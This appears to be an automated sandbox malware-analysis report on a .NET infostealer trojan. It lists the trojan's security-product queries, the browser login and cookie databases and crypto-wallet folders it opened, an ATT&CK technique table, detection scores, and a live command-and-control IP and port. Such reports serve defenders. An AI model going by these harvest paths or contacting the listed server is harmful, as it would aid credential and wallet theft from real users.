                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2243746245.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2351734880.0000000006D87000.00000004.00000020.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2326375186.0000000000DAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 3620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 7448, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

                    Remote Access Functionality

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 3620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 7448, type: MEMORYSTR
                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                    Execution: 221 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
                    Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                    Privilege Escalation: 111 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
                    Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 241 Virtualization/Sandbox Evasion; 111 Process Injection; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                    Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                    Discovery: 331 Security Software Discovery; 1 Process Discovery; 241 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                    Collection: 1 Archive Collected Data; 2 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                    Command and Control: 1 Encrypted Channel; 11 Non-Standard Port; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
                    Behavior Graph (image not reproduced): ID: 1483367, Sample: RgIbrhxoEx.exe, Startdate: 27/07/2024, Architecture: WINDOWS, Score: 100

                    Source | Detection | Scanner | Label
                    RgIbrhxoEx.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
                    RgIbrhxoEx.exe | 43% | Virustotal |
                    RgIbrhxoEx.exe | 100% | Joe Sandbox ML |

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\LjGABleGAy.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
                    C:\Users\user\AppData\Roaming\LjGABleGAy.exe | 43% | Virustotal |

                    No Antivirus matches

                    Source | Detection | Scanner | Label
                    api.ip.sb | 0% | Virustotal |

                    Source | Detection | Scanner | Label
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe
                    http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe
                    http://tempuri.org/ | 0% | URL Reputation | safe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
                    https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
                    https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing | 0% | URL Reputation | safe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/soap/actor/next | 0% | URL Reputation | safe
                    http://tempuri.org/Endpoint/CheckConnectResponse | 0% | Avira URL Cloud | safe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
                    https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
                    https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
                    https://ipinfo.io/ip%appdata% | 0% | Avira URL Cloud | safe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
                    https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
                    http://tempuri.org/Endpoint/EnvironmentSettings | 0% | Avira URL Cloud | safe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX | 0% | Avira URL Cloud | safe
                    https://duckduckgo.com/ac/?q= | 0% | Virustotal |
                    https://ipinfo.io/ip%appdata% | 0% | Virustotal |
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | Avira URL Cloud | safe
                    https://api.ip.sb | 0% | Avira URL Cloud | safe
                    https://api.ip.sb/geoip | 0% | Avira URL Cloud | safe
                    http://tempuri.org/Endpoint/EnvironmentSettings | 2% | Virustotal |
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | Virustotal |
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX | 0% | Virustotal |
                    https://api.ip.sb | 0% | Virustotal |
                    http://tempuri.org/Endpoint/CheckConnect | 0% | Avira URL Cloud | safe
                    http://tempuri.org/Endpoint/CheckConnectResponse | 1% | Virustotal |
                    http://tempuri.org/Endpoint/VerifyUpdateResponse | 0% | Avira URL Cloud | safe
                    http://tempuri.org/Endpoint/SetEnvironment | 0% | Avira URL Cloud | safe
                    https://api.ip.sb/geoip | 0% | Virustotal |
                    http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | Avira URL Cloud | safe
                    http://185.222.57.151:55615t- | 0% | Avira URL Cloud | safe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
                    http://tempuri.org/Endpoint/VerifyUpdateResponse | 1% | Virustotal |
                    http://tempuri.org/Endpoint/GetUpdates | 0% | Avira URL Cloud | safe
                    http://185.222.57.151:55615/ | 0% | Avira URL Cloud | safe
                    https://api.ipify.orgcookies//settinString.Removeg | 0% | Avira URL Cloud | safe
                    http://185.222.57.151:55615 | 0% | Avira URL Cloud | safe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse | 1% | Virustotal |
                    http://tempuri.org/Endpoint/CheckConnect | 1% | Virustotal |
                    http://185.222.57.151:55615 | 4% | Virustotal |
                    http://tempuri.org/Endpoint/GetUpdatesResponse | 0% | Avira URL Cloud | safe
                    http://185.222.57.151:55615/ | 4% | Virustotal |
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | Avira URL Cloud | safe
                    http://tempuri.org/Endpoint/VerifyUpdate | 0% | Avira URL Cloud | safe
                    185.222.57.151:55615 | 0% | Avira URL Cloud | safe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 1% | Virustotal |
                    http://tempuri.org/0 | 0% | Avira URL Cloud | safe
                    http://tempuri.org/Endpoint/GetUpdatesResponse | 1% | Virustotal |
                    http://tempuri.org/Endpoint/VerifyUpdate | 1% | Virustotal |
                    http://tempuri.org/0 | 0% | Virustotal |
                    http://tempuri.org/Endpoint/GetUpdates | 1% | Virustotal |
                    185.222.57.151:55615 | 4% | Virustotal |
                    http://tempuri.org/Endpoint/SetEnvironment | 1% | Virustotal |

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.ip.sb | unknown | unknown | true | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    http://185.222.57.151:55615/ | true | 4%, Virustotal; Avira URL Cloud: safe | unknown
                    185.222.57.151:55615 | true | 4%, Virustotal; Avira URL Cloud: safe | unknown

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ipinfo.io/ip%appdata%RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/chrome_newtabRgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/ac/?q=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoRgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/CheckConnectResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.datacontract.org/2004/07/RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingsRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003100000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.ip.sbLjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.ip.sb/geoipLjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/soap/envelope/LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/CheckConnectRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2337066239.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.ecosia.org/newtab/RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/VerifyUpdateResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0RgIbrhxoEx.exe, LjGABleGAy.exe.0.drfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/SetEnvironmentLjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/Endpoint/SetEnvironmentResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.222.57.151:55615t-RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
